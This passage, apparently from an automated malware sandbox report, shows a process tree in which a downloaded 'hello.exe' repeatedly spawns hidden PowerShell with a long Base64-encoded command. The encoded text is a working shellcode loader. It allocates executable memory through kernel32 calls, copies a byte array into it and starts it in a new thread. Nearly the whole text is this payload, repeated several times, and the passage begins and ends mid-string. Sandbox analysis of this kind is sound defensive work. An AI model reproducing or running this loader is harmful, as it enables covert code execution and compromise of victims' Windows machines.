DIAOQAsADAAeABkAGMALAAwAHgAMQBkACwAMAB4AGIAMgAsADAAeAA4ADEALAAwAHgAMgBjACwAMAB4ADAANQAsADAAeAA1ADAALAAwAHgAYgBkACwAMAB4ADcANAAsADAAeABlAGQALAAwAHgAZQA0ACwAMAB4ADcAMAAsADAAeABlADEALAAwAHgAMwBmACwAMAB4ADkAOAAsADAAeAAwADgALAAwAHgAYgBhACwAMAB4ADYAZAAsADAAeAAyADMALAAwAHgAOAA2ACwAMAB4ADUAZAAsADAAeABhADUALAAwAHgAZQBmACwAMAB4ADMAYgAsADAAeABjADQALAAwAHgAYQAxACwAMAB4AGUAZgAsADAAeABlAGIALAAwAHgAOQAwACwAMAB4ADcAZQAsADAAeAA3ADkALAAwAHgAOQA0ACwAMAB4AGEANwAsADAAeAA3AGYALAAwAHgAYQBjACwAMAB4ADIAMgAsADAAeABlADEALAAwAHgAMgBjACwAMAB4ADIANwAsADAAeAAzADUALAAwAHgAZABjACwAMAB4ADMAYQAsADAAeAAzADMALAAwAHgANgA2ACwAMAB4ADcAMwAsADAAeABlADkALAAwAHgANgBiACwAMAB4AGQAYQAsADAAeAAyADUALAAwAHgANgA1ACwAMAB4ADcAZgAsADAAeAA4ADkALAAwAHgAZQA3ACwAMAB4ADQAZQAsADAAeAA4ADAALAAwAHgAZQA3ACwAMAB4ADYAZQAsADAAeABkAGEALAAwAHgANwA0ACwAMAB4ADUANwAsADAAeABlADcALAAwAHgAOQBhACwAMAB4AGIAYQAsADAAeAA2ADcALAAwAHgAZgA3ACwAMAB4ADEAMwAsADAAeAA1AGMALAAwAHgAMABkACwAMAB4AGYAMwAsADAAeAA3ADMALAAwAHgAZgA3ACwAMAB4AGMAZAAsADAAeABhAGQALAAwAHgAMQBiACwAMAB4ADcAMgAsADAAeABiADQALAAwAHgAYwBmACwAMAB4ADUAZAAsADAAeAA4ADMALAAwAHgAZQBkACwAMAB4AGEAMwAsADAAeAAzADIALAAwAHgAMgBmACwAMAB4ADUAZAAsADAAeAAxADIALAAwAHgAZABjACwAMAB4AGUAMgAsADAAeAA2ADcALAAwAHgAOAAyACwAMAB4ADYANwAsADAAeAAwADIALAAwAHgAYgAyACwAMAB4ADMANwAsADAAeAA1ADcALAAwAHgAOAA5ACwAMAB4ADIAYgAsADAAeAA1ADAALAAwAHgAZABmACwAMAB4ADYAMQAsADAAeAA1ADQALAAwAHgAYQAwACwAMAB4AGIANwAsADAAeABjADEALAAwAHgAYQA0ACwAMAB4ADkANQAsADAAeABhADcALAAwAHgAMwA1ACwAMAB4ADkAMQAsADAAeAA5ADkALAAwAHgANQAyACwAMAB4ADAANwAsADAAeAA3ADIALAAwAHgAZAA2ACwAMAB4ADIAOQAsADAAeAAzADUALAAwAHgAZAA1ACwAMAB4AGUAOQAsADAAeAA4ADQALAAwAHgANQAwACwAMAB4ADkAYQAsADAAeAA3AGQALAAwAHgAMgA2ACwAMAB4AGIANQAsADAAeAAxAGEALAAwAHgANwBlACwAMAB4ADQAZQAsADAAeABiADUALAAwAHgAMQBhACwAMAB4ADMAZQAsADAAeAA4AGUALAAwAHgAZQA2ACwAMAB4ADcAMgAsADAAeABlADYALAAwAHgAMgBhACwAMAB4ADUAYgAsADAAeAA2ADYALAAwAHgAZQA5ACwAMAB4AGUANwAsADAAeABjAGYALAAwAHgAMwBiACwAMAB4ADQANQAsADAAeAA4AGUALAAwAHgAMQA3ACwAMAB4AGUAYwAsADAAeAAwADEALAAwAHgAOQAwACwAMAB4AGYANwAsADAAeAAxADMALAAwAHgAZAAyACwAMAB4AGMAMwAsADAAeABhADEALAAwAHgANwBiACwAMAB4AGMAMAAsADAAeAA3ADUALAAwAHgAYwA0ACwAMAB4ADkAZQAsADAAeAAxAGIALAAwAHgAYQBjACwAMAB4ADUAMgAsADAAeAA5AGUALAAwAHgAOQAwACwAMAB4ADgAMwAsADAAeABkADYALAAwAHgAMQA4ACwAMAB4ADUAOAAsADAAeABkADgALAAwAHgANgBjACwAMAB4AGUANgAsADAAeAAyAGYALAAwAHgAMwBiACwAMAB4ADMANgAsADAAeAAyADQALAAwAHgAOQAwACwAMAB4ADIAYgAsADAAeABhAGUALAAwAHgANQA1ACwAMAB4AGQAMAAsADAAeAA1ADQALAAwAHgAMAAwACwAMAB4ADkAMwAsADAAeAAxAGQALAAwAHgAOAA0ACwAMAB4ADUAMgAsADAAeABkADUALAAwAHgANQA5ACwAMAB4AGYANgAsADAAeABhAGMALAAwAHgAMgAxACwAMAB4AGIANAAsADAAeAAzADcALAAwAHgAZgBmACwAMAB4ADYAOQAsADAAeABjADgAOwAkAGcAIAA9ACAAMAB4ADEAMAAwADAAOwBpAGYAIAAoACQAegAuAEwAZQBuAGcAdABoACAALQBnAHQAIAAwAHgAMQAwADAAMAApAHsAJABnACAAPQAgACQAegAuAEwAZQBuAGcAdABoAH0AOwAkAEoAYQBYAD0AJAB3ADoAOgBWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoADAALAAwAHgAMQAwADAAMAAsACQAZwAsADAAeAA0ADAAKQA7AGYAbwByACAAKAAkAGkAPQAwADsAJABpACAALQBsAGUAIAAoACQAegAuAEwAZQBuAGcAdABoAC0AMQApADsAJABpACsAKwApACAAewAkAHcAOgA6AG0AZQBtAHMAZQB0ACgAWwBJAG4AdABQAHQAcgBdACgAJABKAGEAWAAuAFQAbwBJAG4AdAAzADIAKAApACsAJABpACkALAAgACQAegBbACQAaQBdACwAIAAxACkAfQA7ACQAdwA6ADoAQwByAGUAYQB0AGUAVABoAHIAZQBhAGQAKAAwACwAMAAsACQASgBhAFgALAAwACwAMAAsADAAKQA7AGYAbwByACAAKAA7ADsAKQB7AFMAdABhAHIAdAAtAHMAbABlAGUAcAAgADYAMAB9ADsAJwA7ACQAZQAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBUAG8AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAG4AaQBjAG8AZABlAC4ARwBlAHQAQgB5AHQAZQBzACgAJAB0AHoAbQApACkAOwAkAG4AeAA3AFYAIAA9ACAAIgAtAGUAbgBjACAAIgA7AGkAZgAoAFsASQBuAHQAUAB0AHIAXQA6ADoAUwBpAHoAZQAgAC0AZQBxACAAOAApAHsAJABHADYAQwBWACAAPQAgACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBSAG8AbwB0ACAAKwAgACIAXABzAHkAcwB3AG8AdwA2ADQAXABXAGkAbgBkAG8AdwBzAFAAbwB3AGUAcgBTAGgAZQBsAGwAXAB2ADEALgAwAFwAcABvAHcAZQByAHMAaABlAGwAbAAiADsAaQBlAHgAIAAiACYAIAAkAEcANgBDAFYAIAAkAG4AeAA3AFYAIAAkAGUAIgB9AGUAbABzAGUAewA7AGkAZQB4ACAAIgAmACAAcABvAHcAZQByAHMAaABlAGwAbAAgACQAbgB4ADcAVgAgACQAZQAiADsAfQA=
  2⤵
  PID:5360

C:\Users\Admin\Downloads\hello.exe
"C:\Users\Admin\Downloads\hello.exe"
1⤵
- Executes dropped EXE
PID:7420
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c powershell -window hidden -EncodedCommand JAB0AHoAbQAgAD0AIAAnACQAWABOAEgAYQAgAD0AIAAnACcAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoAEkAbgB0AFAAdAByACAAbABwAEEAZABkAHIAZQBzAHMALAAgAHUAaQBuAHQAIABkAHcAUwBpAHoAZQAsACAAdQBpAG4AdAAgAGYAbABBAGwAbABvAGMAYQB0AGkAbwBuAFQAeQBwAGUALAAgAHUAaQBuAHQAIABmAGwAUAByAG8AdABlAGMAdAApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoAEkAbgB0AFAAdAByACAAbABwAFQAaAByAGUAYQBkAEEAdAB0AHIAaQBiAHUAdABlAHMALAAgAHUAaQBuAHQAIABkAHcAUwB0AGEAYwBrAFMAaQB6AGUALAAgAEkAbgB0AFAAdAByACAAbABwAFMAdABhAHIAdABBAGQAZAByAGUAcwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABQAGEAcgBhAG0AZQB0AGUAcgAsACAAdQBpAG4AdAAgAGQAdwBDAHIAZQBhAHQAaQBvAG4ARgBsAGEAZwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABUAGgAcgBlAGEAZABJAGQAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAG0AcwB2AGMAcgB0AC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABtAGUAbQBzAGUAdAAoAEkAbgB0AFAAdAByACAAZABlAHMAdAAsACAAdQBpAG4AdAAgAHMAcgBjACwAIAB1AGkAbgB0ACAAYwBvAHUAbgB0ACkAOwAnACcAOwAkAHcAIAA9ACAAQQBkAGQALQBUAHkAcABlACAALQBtAGUAbQBiAGUAcgBEAGUAZgBpAG4AaQB0AGkAbwBuACAAJABYAE4ASABhACAALQBOAGEAbQBlACAAIgBXAGkAbgAzADIAIgAgAC0AbgBhAG0AZQBzAHAAYQBjAGUAIABXAGkAbgAzADIARgB1AG4AYwB0AGkAbwBuAHMAIAAtAHAAYQBzAHMAdABoAHIAdQA7AFsAQgB5AHQAZQBbAF0AXQA7AFsAQgB5AHQAZQBbAF0AXQAkAHoAIAA9ACAAMAB4AGQAYgAsADAAeABkAGUALAAwAHgAYgBlACwAMAB4ADIAOQAsADAAeABmAGMALAAwAHgAZAA0ACwAMAB4ADcANAAsADAAeABkADkALAAwAHgANwA0ACwAMAB4ADIANAAsADAAeABmADQALAAwAHgANQA4ACwAMAB4ADMAMwAsADAAeABjADkALAAwAHgAYgAxACwAMAB4ADYAMwAsADAAeAAzADEALAAwAHgANwAwACwAMAB4ADEAYQAsADAAeAAwADMALAAwAHgANwAwACwAMAB4ADEAYQAsADAAeAA4ADMALAAwAHgAYwAwACwAMAB4ADAANAAsADAAeABlADIALAAwAHgAZABjACwAMAB4ADAAMAAsADAAeAAzAGMALAAwAHgAZgBiACwAMAB4ADEAZQAsADAAeABmADkALAAwAHgAYgBkACwAMAB4ADYANAAsADAAeAAyAGYALAAwAHgAMgBiACwAMAB4ADMANAAsADAAeAA4ADEALAAwAHgAMgBiACwAMAB4ADQAMAAsADAAeAAxADUALAAwAHgANwBhACwAMAB4ADMAOAAsADAAeAAwADQALAAwAHgAOQA2ACwAMAB4AGYAMQAsADAAeAA2AGMALAAwAHgAYgBkACwAMAB4AGEAOQAsADAAeABiADIALAAwAHgAZABhACwAMAB4ADkAYgAsADAAeAA4ADQALAAwAHgANAAzACwAMAB4ADUAMQAsADAAeAA5ADEALAAwAHgAYwBlACwAMAB4ADgAYQAsADAAeABhADUALAAwAHgAZgBhACwAMAB4ADMAMwAsADAAeAA4AGMALAAwAHgANQA5ACwAMAB4ADAAMQAsADAAeAA2ADAALAAwAHgANgBlACwAMAB4ADYAMAAsADAAeABjAGEALAAwAHgANwA1ACwAMAB4ADYAZgAsADAAeABhADUALAAwAHgAOQBjACwAMAB4AGYAMAAsADAAeAA4ADAALAAwAHgANwBiACwAMAB4ADkANAAsADAAeABhADkALAAwAHgANABlACwAMAB4ADIAYwAsADAAeAAyADEALAAwAHgAMABmACwAMAB4ADUAMwAsADAAeABkADMALAAwAHgAZQA1ACwAMAB4ADEAYgAsADAAeABlAGIALAAwAHgAYQBiACwAMAB4ADgAMAAsADAAeABkAGMALAAwAHgAOQA4ACwAMAB4ADAANwAsADAAeAA4AGEALAAwAHgAMABjACwAMAB4AGUAYgAsADAAeABkAGYALAAwAHgAOQA0ACwAMAB4AGYAYwAsADAAeAA2ADcALAAwAHgAOAA3ACwAMAB4ADgANAAsADAAeABmAGQALAAwAHgAYQA0ACwAMAB4AGIAMgAsADAAeAAwAGMALAAwAHgAOAA5ACwAMAB4ADcANgAsADAAeABmADUALAAwAHgAMAA1ACwAMAB4ADQANgAsADAAeAAwAGMALAAwAHgAMwA0ACwAMAB4AGUANQAsADAAeABhADYALAAwAHgAYwA0ACwAMAB4ADAANwAsADAAeABkADkALAAwAHgANgA4ACwAMAB4ADIANwAsADAAeAA2AGEALAAwAHgANwA1ACwAMAB4ADYAYgAsADAAeAA3AGYALAAwAHgANABjACwAMAB4ADYANQAsADAAeAAxADkALAAwAHgAOABiACwAMAB4AGEAZgAsADAAeAAxADgALAAwAHgAMQBhACwAMAB4ADQAOAAsADAAeABkADIALAAwAHgAYwA2ACwAMAB4AGEAZgAsADAAeAA0AGYALAAwAHgANwA0ACwAMAB4ADgAYwAsADAAeAAwADgALAAwAHgAYgA0ACwAMAB4ADgANQAsADAAeAA0ADEALAAwAHgAYwBlACwAMAB4ADMAZgAsADAAeAA4ADkALAAwAHgAMgBlACwAMAB4ADgANAAsADAAeAAxADgALAAwAHgAOABkACwAMAB4AGIAMQAsADAAeAA0ADkALAAwAHgAMQAzACwAMAB4AGEAOQAsADAAeAAzAGEALAAwAHgANgBjACwAMAB4AGYANAAsADAAeAAzADgALAAwAHgANwA4ACwAMAB4ADQAYgAsADAAeABkADAALAAwAHgANgAxACwAMAB4AGQAYQAsADAAeABmADIALAAwAHgANAAxACwAMAB4AGMAZgAsADAAeAA4AGQALAAwAHgAMABiACwAMAB4ADkAMQAsADAAeABiADcALAAwAHgANwAyACwAMAB4AGEAZQAsADAAeABkADkALAAwAHgANQA1ACwAMAB4ADYANAAsADAAeABjAGUALAAwAHgAMgAxACwAMAB4AGEANgAsADAAeAA4ADkALAAwAHgAOQAyACwAMAB4AGIANQAsADAAeAAzADYALAAwAHgAMQAzACwAMAB4ADUAOQAsADAAeAA0ADYALAAwAHgAYQBlACwAMAB4AGEAYwAsADAAeABjADgALAAwAHgAMgA4ACwAMAB4ADQANwAsADAAeAAwADcALAAwAHgANgAzACwAMAB4AGYAOQAsADAAeABlADAALAAwAHgAOAAxACwAMAB4ADcANAAsADAAeABmAGUALAAwAHgAZABiACwAMAB4AGYAZgAsADAAeABhADEALAAwAHgANQAzACwAMAB4AGIAMAAsADAAeABhAGMALAAwAHgAMAA2ACwAMAB4ADAANwAsADAAeAA1AGUALAAwAHgANgA5ACwAMAB4AGYAZgAsADAAeABkAGUALAAwAHgAMwA5ACwAMAB4ADcAMgAsADAAeAAyAGEALAAwAHgANwAzACwAMAB4ADEANgAsADAAeABlADcALAAwAHgAZAA2ACwAMAB4ADIANwAsADAAeABjAGIALAAwAHgAOQBmACwAMAB4ADcANgAsADAAeABjAGYALAAwAHgAZQBiACwAMAB4ADUAZgAsADAAeAA2AGYALAAwAHgANgAwACwAMAB4AGUAYgAsADAAeAA1AGYALAAwAHgANgBmACwAMAB4AGEAZQAsADAAeABhAGUALAAwAHgAMwBhACwAMAB4ADIAOQAsADAAeABkAGMALAAwAHgAMQBkACwAMAB4AGIAMgAsADAAeAA4ADEALAAwAHgAMgBjACwAMAB4ADAANQAsADAAeAA1ADAALAAwAHgAYgBkACwAMAB4ADcANAAsADAAeABlAGQALAAwAHgAZQA0ACwAMAB4ADcAMAAsADAAeABlADEALAAwAHgAMwBmACwAMAB4ADkAOAAsADAAeAAwADgALAAwAHgAYgBhACwAMAB4ADYAZAAsADAAeAAyADMALAAwAHgAOAA2ACwAMAB4ADUAZAAsADAAeABhADUALAAwAHgAZQBmACwAMAB4ADMAYgAsADAAeABjADQALAAwAHgAYQAxACwAMAB4AGUAZgAsADAAeABlAGIALAAwAHgAOQAwACwAMAB4ADcAZQAsADAAeAA3ADkALAAwAHgAOQA0ACwAMAB4AGEANwAsADAAeAA3AGYALAAwAHgAYQBjACwAMAB4ADIAMgAsADAAeABlADEALAAwAHgAMgBjACwAMAB4ADIANwAsADAAeAAzADUALAAwAHgAZABjACwAMAB4ADMAYQAsADAAeAAzADMALAAwAHgANgA2ACwAMAB4ADcAMwAsADAAeABlADkALAAwAHgANgBiACwAMAB4AGQAYQAsADAAeAAyADUALAAwAHgANgA1ACwAMAB4ADcAZgAsADAAeAA4ADkALAAwAHgAZQA3ACwAMAB4ADQAZQAsADAAeAA4ADAALAAwAHgAZQA3ACwAMAB4ADYAZQAsADAAeABkAGEALAAwAHgANwA0ACwAMAB4ADUANwAsADAAeABlADcALAAwAHgAOQBhACwAMAB4AGIAYQAsADAAeAA2ADcALAAwAHgAZgA3ACwAMAB4ADEAMwAsADAAeAA1AGMALAAwAHgAMABkACwAMAB4AGYAMwAsADAAeAA3ADMALAAwAHgAZgA3ACwAMAB4AGMAZAAsADAAeABhAGQALAAwAHgAMQBiACwAMAB4ADcAMgAsADAAeABiADQALAAwAHgAYwBmACwAMAB4ADUAZAAsADAAeAA4ADMALAAwAHgAZQBkACwAMAB4AGEAMwAsADAAeAAzADIALAAwAHgAMgBmACwAMAB4ADUAZAAsADAAeAAxADIALAAwAHgAZABjACwAMAB4AGUAMgAsADAAeAA2ADcALAAwAHgAOAAyACwAMAB4ADYANwAsADAAeAAwADIALAAwAHgAYgAyACwAMAB4ADMANwAsADAAeAA1ADcALAAwAHgAOAA5ACwAMAB4ADIAYgAsADAAeAA1ADAALAAwAHgAZABmACwAMAB4ADYAMQAsADAAeAA1ADQALAAwAHgAYQAwACwAMAB4AGIANwAsADAAeABjADEALAAwAHgAYQA0ACwAMAB4ADkANQAsADAAeABhADcALAAwAHgAMwA1ACwAMAB4ADkAMQAsADAAeAA5ADkALAAwAHgANQAyACwAMAB4ADAANwAsADAAeAA3ADIALAAwAHgAZAA2ACwAMAB4ADIAOQAsADAAeAAzADUALAAwAHgAZAA1ACwAMAB4AGUAOQAsADAAeAA4ADQALAAwAHgANQAwACwAMAB4ADkAYQAsADAAeAA3AGQALAAwAHgAMgA2ACwAMAB4AGIANQAsADAAeAAxAGEALAAwAHgANwBlACwAMAB4ADQAZQAsADAAeABiADUALAAwAHgAMQBhACwAMAB4ADMAZQAsADAAeAA4AGUALAAwAHgAZQA2ACwAMAB4ADcAMgAsADAAeABlADYALAAwAHgAMgBhACwAMAB4ADUAYgAsADAAeAA2ADYALAAwAHgAZQA5ACwAMAB4AGUANwAsADAAeABjAGYALAAwAHgAMwBiACwAMAB4ADQANQAsADAAeAA4AGUALAAwAHgAMQA3ACwAMAB4AGUAYwAsADAAeAAwADEALAAwAHgAOQAwACwAMAB4AGYANwAsADAAeAAxADMALAAwAHgAZAAyACwAMAB4AGMAMwAsADAAeABhADEALAAwAHgANwBiACwAMAB4AGMAMAAsADAAeAA3ADUALAAwAHgAYwA0ACwAMAB4ADkAZQAsADAAeAAxAGIALAAwAHgAYQBjACwAMAB4ADUAMgAsADAAeAA5AGUALAAwAHgAOQAwACwAMAB4ADgAMwAsADAAeABkADYALAAwAHgAMQA4ACwAMAB4ADUAOAAsADAAeABkADgALAAwAHgANgBjACwAMAB4AGUANgAsADAAeAAyAGYALAAwAHgAMwBiACwAMAB4ADMANgAsADAAeAAyADQALAAwAHgAOQAwACwAMAB4ADIAYgAsADAAeABhAGUALAAwAHgANQA1ACwAMAB4AGQAMAAsADAAeAA1ADQALAAwAHgAMAAwACwAMAB4ADkAMwAsADAAeAAxAGQALAAwAHgAOAA0ACwAMAB4ADUAMgAsADAAeABkADUALAAwAHgANQA5ACwAMAB4AGYANgAsADAAeABhAGMALAAwAHgAMgAxACwAMAB4AGIANAAsADAAeAAzADcALAAwAHgAZgBmACwAMAB4ADYAOQAsADAAeABjADgAOwAkAGcAIAA9ACAAMAB4ADEAMAAwADAAOwBpAGYAIAAoACQAegAuAEwAZQBuAGcAdABoACAALQBnAHQAIAAwAHgAMQAwADAAMAApAHsAJABnACAAPQAgACQAegAuAEwAZQBuAGcAdABoAH0AOwAkAEoAYQBYAD0AJAB3ADoAOgBWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoADAALAAwAHgAMQAwADAAMAAsACQAZwAsADAAeAA0ADAAKQA7AGYAbwByACAAKAAkAGkAPQAwADsAJABpACAALQBsAGUAIAAoACQAegAuAEwAZQBuAGcAdABoAC0AMQApADsAJABpACsAKwApACAAewAkAHcAOgA6AG0AZQBtAHMAZQB0ACgAWwBJAG4AdABQAHQAcgBdACgAJABKAGEAWAAuAFQAbwBJAG4AdAAzADIAKAApACsAJABpACkALAAgACQAegBbACQAaQBdACwAIAAxACkAfQA7ACQAdwA6ADoAQwByAGUAYQB0AGUAVABoAHIAZQBhAGQAKAAwACwAMAAsACQASgBhAFgALAAwACwAMAAsADAAKQA7AGYAbwByACAAKAA7ADsAKQB7AFMAdABhAHIAdAAtAHMAbABlAGUAcAAgADYAMAB9ADsAJwA7ACQAZQAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBUAG8AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAG4AaQBjAG8AZABlAC4ARwBlAHQAQgB5AHQAZQBzACgAJAB0AHoAbQApACkAOwAkAG4AeAA3AFYAIAA9ACAAIgAtAGUAbgBjACAAIgA7AGkAZgAoAFsASQBuAHQAUAB0AHIAXQA6ADoAUwBpAHoAZQAgAC0AZQBxACAAOAApAHsAJABHADYAQwBWACAAPQAgACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBSAG8AbwB0ACAAKwAgACIAXABzAHkAcwB3AG8AdwA2ADQAXABXAGkAbgBkAG8AdwBzAFAAbwB3AGUAcgBTAGgAZQBsAGwAXAB2ADEALgAwAFwAcABvAHcAZQByAHMAaABlAGwAbAAiADsAaQBlAHgAIAAiACYAIAAkAEcANgBDAFYAIAAkAG4AeAA3AFYAIAAkAGUAIgB9AGUAbABzAGUAewA7AGkAZQB4ACAAIgAmACAAcABvAHcAZQByAHMAaABlAGwAbAAgACQAbgB4ADcAVgAgACQAZQAiADsAfQA=
  2⤵
  PID:3232

C:\Users\Admin\Downloads\hello.exe
"C:\Users\Admin\Downloads\hello.exe"
1⤵
- Executes dropped EXE
PID:1528
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c powershell -window hidden -EncodedCommand JAB0AHoAbQAgAD0AIAAnACQAWABOAEgAYQAgAD0AIAAnACcAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoAEkAbgB0AFAAdAByACAAbABwAEEAZABkAHIAZQBzAHMALAAgAHUAaQBuAHQAIABkAHcAUwBpAHoAZQAsACAAdQBpAG4AdAAgAGYAbABBAGwAbABvAGMAYQB0AGkAbwBuAFQAeQBwAGUALAAgAHUAaQBuAHQAIABmAGwAUAByAG8AdABlAGMAdAApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoAEkAbgB0AFAAdAByACAAbABwAFQAaAByAGUAYQBkAEEAdAB0AHIAaQBiAHUAdABlAHMALAAgAHUAaQBuAHQAIABkAHcAUwB0AGEAYwBrAFMAaQB6AGUALAAgAEkAbgB0AFAAdAByACAAbABwAFMAdABhAHIAdABBAGQAZAByAGUAcwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABQAGEAcgBhAG0AZQB0AGUAcgAsACAAdQBpAG4AdAAgAGQAdwBDAHIAZQBhAHQAaQBvAG4ARgBsAGEAZwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABUAGgAcgBlAGEAZABJAGQAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAG0AcwB2AGMAcgB0AC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABtAGUAbQBzAGUAdAAoAEkAbgB0AFAAdAByACAAZABlAHMAdAAsACAAdQBpAG4AdAAgAHMAcgBjACwAIAB1AGkAbgB0ACAAYwBvAHUAbgB0ACkAOwAnACcAOwAkAHcAIAA9ACAAQQBkAGQALQBUAHkAcABlACAALQBtAGUAbQBiAGUAcgBEAGUAZgBpAG4AaQB0AGkAbwBuACAAJABYAE4ASABhACAALQBOAGEAbQBlACAAIgBXAGkAbgAzADIAIgAgAC0AbgBhAG0AZQBzAHAAYQBjAGUAIABXAGkAbgAzADIARgB1AG4AYwB0AGkAbwBuAHMAIAAtAHAAYQBzAHMAdABoAHIAdQA7AFsAQgB5AHQAZQBbAF0AXQA7AFsAQgB5AHQAZQBbAF0AXQAkAHoAIAA9ACAAMAB4AGQAYgAsADAAeABkAGUALAAwAHgAYgBlACwAMAB4ADIAOQAsADAAeABmAGMALAAwAHgAZAA0ACwAMAB4ADcANAAsADAAeABkADkALAAwAHgANwA0ACwAMAB4ADIANAAsADAAeABmADQALAAwAHgANQA4ACwAMAB4ADMAMwAsADAAeABjADkALAAwAHgAYgAxACwAMAB4ADYAMwAsADAAeAAzADEALAAwAHgANwAwACwAMAB4ADEAYQAsADAAeAAwADMALAAwAHgANwAwACwAMAB4ADEAYQAsADAAeAA4ADMALAAwAHgAYwAwACwAMAB4ADAANAAsADAAeABlADIALAAwAHgAZABjACwAMAB4ADAAMAAsADAAeAAzAGMALAAwAHgAZgBiACwAMAB4ADEAZQAsADAAeABmADkALAAwAHgAYgBkACwAMAB4ADYANAAsADAAeAAyAGYALAAwAHgAMgBiACwAMAB4ADMANAAsADAAeAA4ADEALAAwAHgAMgBiACwAMAB4ADQAMAAsADAAeAAxADUALAAwAHgANwBhACwAMAB4ADMAOAAsADAAeAAwADQALAAwAHgAOQA2ACwAMAB4AGYAMQAsADAAeAA2AGMALAAwAHgAYgBkACwAMAB4AGEAOQAsADAAeABiADIALAAwAHgAZABhACwAMAB4ADkAYgAsADAAeAA4ADQALAAwAHgANAAzACwAMAB4ADUAMQAsADAAeAA5ADEALAAwAHgAYwBlACwAMAB4ADgAYQAsADAAeABhADUALAAwAHgAZgBhACwAMAB4ADMAMwAsADAAeAA4AGMALAAwAHgANQA5ACwAMAB4ADAAMQAsADAAeAA2ADAALAAwAHgANgBlACwAMAB4ADYAMAAsADAAeABjAGEALAAwAHgANwA1ACwAMAB4ADYAZgAsADAAeABhADUALAAwAHgAOQBjACwAMAB4AGYAMAAsADAAeAA4ADAALAAwAHgANwBiACwAMAB4ADkANAAsADAAeABhADkALAAwAHgANABlACwAMAB4ADIAYwAsADAAeAAyADEALAAwAHgAMABmACwAMAB4ADUAMwAsADAAeABkADMALAAwAHgAZQA1ACwAMAB4ADEAYgAsADAAeABlAGIALAAwAHgAYQBiACwAMAB4ADgAMAAsADAAeABkAGMALAAwAHgAOQA4ACwAMAB4ADAANwAsADAAeAA4AGEALAAwAHgAMABjACwAMAB4AGUAYgAsADAAeABkAGYALAAwAHgAOQA0ACwAMAB4AGYAYwAsADAAeAA2ADcALAAwAHgAOAA3ACwAMAB4ADgANAAsADAAeABmAGQALAAwAHgAYQA0ACwAMAB4AGIAMgAsADAAeAAwAGMALAAwAHgAOAA5ACwAMAB4ADcANgAsADAAeABmADUALAAwAHgAMAA1ACwAMAB4ADQANgAsADAAeAAwAGMALAAwAHgAMwA0ACwAMAB4AGUANQAsADAAeABhADYALAAwAHgAYwA0ACwAMAB4ADAANwAsADAAeABkADkALAAwAHgANgA4ACwAMAB4ADIANwAsADAAeAA2AGEALAAwAHgANwA1ACwAMAB4ADYAYgAsADAAeAA3AGYALAAwAHgANABjACwAMAB4ADYANQAsADAAeAAxADkALAAwAHgAOABiACwAMAB4AGEAZgAsADAAeAAxADgALAAwAHgAMQBhACwAMAB4ADQAOAAsADAAeABkADIALAAwAHgAYwA2ACwAMAB4AGEAZgAsADAAeAA0AGYALAAwAHgANwA0ACwAMAB4ADgAYwAsADAAeAAwADgALAAwAHgAYgA0ACwAMAB4ADgANQAsADAAeAA0ADEALAAwAHgAYwBlACwAMAB4ADMAZgAsADAAeAA4ADkALAAwAHgAMgBlACwAMAB4ADgANAAsADAAeAAxADgALAAwAHgAOABkACwAMAB4AGIAMQAsADAAeAA0ADkALAAwAHgAMQAzACwAMAB4AGEAOQAsADAAeAAzAGEALAAwAHgANgBjACwAMAB4AGYANAAsADAAeAAzADgALAAwAHgANwA4ACwAMAB4ADQAYgAsADAAeABkADAALAAwAHgANgAxACwAMAB4AGQAYQAsADAAeABmADIALAAwAHgANAAxACwAMAB4AGMAZgAsADAAeAA4AGQALAAwAHgAMABiACwAMAB4ADkAMQAsADAAeABiADcALAAwAHgANwAyACwAMAB4AGEAZQAsADAAeABkADkALAAwAHgANQA1ACwAMAB4ADYANAAsADAAeABjAGUALAAwAHgAMgAxACwAMAB4AGEANgAsADAAeAA4ADkALAAwAHgAO